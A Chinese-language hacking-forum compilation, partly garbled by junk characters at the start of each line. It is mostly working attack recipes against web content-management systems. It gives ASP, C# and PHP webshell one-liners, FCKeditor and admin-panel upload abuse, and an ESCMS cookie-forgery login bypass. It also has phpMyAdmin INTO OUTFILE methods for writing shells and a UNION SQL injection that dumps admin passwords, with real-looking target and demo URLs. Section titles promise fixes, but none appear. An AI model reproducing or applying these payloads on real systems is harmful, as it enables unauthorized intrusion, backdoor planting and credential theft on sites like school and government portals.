+ R# p9 y' E5 V<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">; p, p& W; a* H% m8 B
Upload a new file:<br> j6 |+ `. e# m: Q
<input type="file" name="NewFile" size="50"><br>
9 a5 V; J: Z3 V: I) y/ q<input id="btnUpload" type="submit" value="Upload">
) ~- V: H' M8 t</form>
' ]: |2 H2 [, N( u; Q/ ^-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- e! j% U- @$ `8 z4 @
1 m4 o* x1 q" n* q# A9 s( aSDcms 后台拿webshell9 ]4 j6 X; m0 Y) I+ c" D7 P% m/ `
. Z( Q- V1 d" ?4 ^! X9 E第一种方法:+ l3 i; i. U) U( H* V
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
) n5 `: b$ x8 Q& _, E8 E2 ?把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx5 g8 o2 d9 b8 N* K. {: V
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
2 m; ]: l" Y2 M) T3 I! R第二种方法:
; o& }* W5 _# l# i进入后台-->系统管理-->系统设置-->系统设置->上传设置;
% e1 C0 p! {5 B& E$ e' s7 P在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!- f" a3 {; ^# z6 w+ H
第三种方法:3 @1 ]* p/ ]. t8 s- z4 M
进入后台-->界面管理-->模板文件管理-->创建文件& V( `& |! T" M( X( P( a" L5 z+ b
文件名写入getshell.ashx( ]+ H. z& f/ }# O3 y4 ^9 V1 R
内容写入下面内容:5 x3 H9 C: s9 Z0 V& H5 M
/====================复制下面的=========================/0 Y' Z, J6 F9 H
<%@ WebHandler Language="C#" Class="Handler" %>
e3 Y3 T3 d1 x) ]+ k) V7 E% r& T- nusing System;
# x1 {% e6 O8 Uusing System.Web;
$ K) `8 e) s0 E) S: Uusing System.IO;
2 F1 L( h4 A: r( {" N; L; c! Spublic class Handler : IHttpHandler {7 L2 D O( f1 { k! t( G0 `
public void ProcessRequest (HttpContext context) {
7 `9 W$ U$ |1 N' vcontext.Response.ContentType = "text/plain";" P8 J8 o* p0 W$ B
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
+ F+ U4 J7 U1 L, kfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");8 Q) }, ]+ w. E' L1 ~
file1.Flush(); J3 A( }, W4 d; E+ [2 ]( J# i
file1.Close();3 H7 t! N- k- u. j+ q2 \ W0 i" r6 p1 C
}, g0 m# T4 N& D( E2 S8 t
public bool IsReusable {
1 h% ?' n) }) H. l$ a; Uget {0 O8 x( I# R7 Y8 n% l
return false;6 s2 t9 O' |& |6 `
}: p3 G# L* p8 ?6 o# R) G( F
}$ Z; K8 ?7 T* S' r0 O) A
}
5 K0 T0 r1 g' A7 w$ ^6 U1 ?# F3 y/=============================================/
( p7 L& c7 z& w9 ~$ G8 P" n) E访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx8 x& w% S4 M8 u$ |4 q9 R
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
7 k. Y4 X ]1 V' E-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 |! C$ I% F8 g" ] G5 k4 t
5 z1 h# P; F3 l) [3 j9 g( M
ESCMS网站管理系统0day1 F* @* m- q1 I; z
8 |, {0 j$ p1 T5 n/ X: U后台登陆验证是通过admin/check.asp实现的
. u3 B' b( \: A# @7 I9 G4 P9 [4 }% j5 q! B, Q3 b; i; m d
首先我们打开http://target.com/admin/es_index.html
: D: u6 I B6 F2 l然后在COOKIE结尾加上- S- F( `8 z% b" X2 N' I
; ESCMS$_SP2=ES_admin=st0p;: y) o7 ?$ e H) w! ?: Y
修改,然后刷新( Z: M F2 E) s8 f3 O
进后台了嘎..
0 R0 @% E8 H7 Q$ c% W然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
3 `! R, U* f9 a( Q& I2 [5 K2 N+ t2 d% o) s6 y( R
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.5 V j9 ]1 H0 i2 h& r8 T1 Y; z
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
' k1 n2 a2 Z0 h/ b存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..4 E- R3 c" g1 Q" Q0 }
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了/ h3 r" ]: q( x" c- P4 I& m% V! X* J; s& P
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" h) n, ]4 M* |3 @3 Q& y# b. u9 U8 m* P0 ]8 q3 _' D
宁志网站管理系统后台无验证漏洞及修复
8 w M7 k9 [5 H) U; _, @8 {& s7 d) b; B! `& c6 X9 T6 z
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
) f: G9 r! K6 E0 E: [1 M; g官方网站:www.ningzhi.net
2 T! I) O+ Y9 \" [* l! s/ K学校网站管理系统 V.2011版本 : Y% k. g; [, H6 S* x
http://down.chinaz.com/soft/29943.htm % k2 H+ {& K/ x7 s8 C7 [$ T
其它版本(如:政府版等),自行下载.
( s9 s6 V" t+ y1 x. i- J# q8 T漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
. d$ B- I& M( e) f$ Nlogin.asp代码如下:
% R) T: A, ~% U) w<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
0 y+ H/ _6 |/ [: C) p) Xmanage.asp代码我就不帖出来了.反正也没验证.4 z/ P" K: m. J6 M% @. R$ Q" d
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
" ]! H* l0 |6 V漏洞利用:
- n/ j" B2 b0 b* m0 O" h6 N直接访问http://www.0855.tv/admin/manage.asp! t+ [( k2 b8 \1 x5 G7 X. O, e
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
6 M1 t$ X5 L6 X9 [----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. o- J) H4 L9 S2 Y+ G) z# j7 |2 ?( b) G6 z
phpmyadmin拿shell的四种方法总结及修复& [8 U5 ]- o; p u
1 r3 m* l, I% R9 i5 J
方法一:8 F7 |' i9 Q7 Q9 ] `1 J
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );6 A a- n# n- k+ _! t5 c
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');% r; J+ ~4 P2 n% f* U6 c
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';& }9 j* @ a; ]; J# _
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
8 y- e0 F1 v/ c4 d 一句话连接密码:7on6 j& Z* |1 D% @& N
方法二:- T9 M" a. v8 W( C/ l6 p
读取文件内容: select load_file('E:/xamp/www/s.php');% m% e2 L3 Q8 u" C
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
8 ^: b# s0 a4 H. Mcmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
4 C& j2 o1 E) x* P* D方法三:4 h) f( t5 i$ z' D' D' H& k; ?% [
JhackJ版本 PHPmyadmin拿shell
8 Z, a2 b' I% DCreate TABLE study (cmd text NOT NULL);
9 P+ O0 L7 t% j0 K5 Q+ |9 v# \Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');+ p9 N) L1 o* w/ X! t( q2 x
select cmd from study into outfile 'E:/wamp/www/7.php';, M+ e0 @; R6 H9 l2 O& ?
Drop TABLE IF EXISTS study;
* j! s( X: T+ P+ D2 c<?php eval($_POST[cmd])?>0 Z# ?4 g# R: l% X( p
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
- V# B( y& w1 q; e' eINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
@, {/ ^$ o6 W4 n2 u, J) ySELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
$ `4 s& P1 d, R0 f* U8 YDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。8 K) m8 S* O0 C6 e8 K2 L* n
方法四:
/ [) d, p, G p: iselect load_file('E:/xamp/www/study.php');
# C }+ _% Q0 f3 j$ `: Pselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
' S7 v+ H2 E* {; j, ?# t然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
8 ]% q4 l, {. ^$ {-----------------------------------------------------------------------------------------------------------------------------------------------------------------------1 o/ s5 w! ^$ r" B+ B4 g# q; ?
' n0 e: N. c+ g: o& H- L% z: I# KNO.001中学网站管理系统 Build 110628 注入漏洞
9 H6 Z1 x" v+ ?, F
3 q7 r9 u! ^4 n# n c" C/ nNO.001中学网站管理系统功能模块:
9 D8 a. f( R0 `. K8 x$ u5 ]1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
. [+ T. R3 r+ P, T5 L6 c2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息$ R4 k, Z: _. z$ F ^
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
9 o0 X% c! |' c8 d R4.视频图片管理:一级分类,动态添加视频或者图片等信息: I8 @$ r# Z+ f: |9 W! v
5.留言管理:对留言,修改,删除、回复等管理6 Y$ j' U5 h0 [% \! T( Y% b& y
6.校友频道:包括校友资料excel导出、管理等功能
% _) A7 @% v( J( V2 f' P7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
9 i8 u1 G0 q, e9 T默认后台:admin/login.asp- P9 H& X, l+ y w$ @
官方演示:http://demo.001cms.net
% W7 T2 G( P2 J) l& P源码下载地址:http://down.chinaz.com/soft/30187.htm
2 ^$ o: R# M, T/ I- ]EXP:
y6 g1 K" _; |% aunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin9 t. ?2 a! U' L7 K- d
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
$ |5 C8 ]; m8 k A6 Wgetshell:后台有备份,你懂的" U! p& M0 W/ `6 o5 K; {& s
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
/ F$ o5 A; \- S5 v% `( x6 w------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |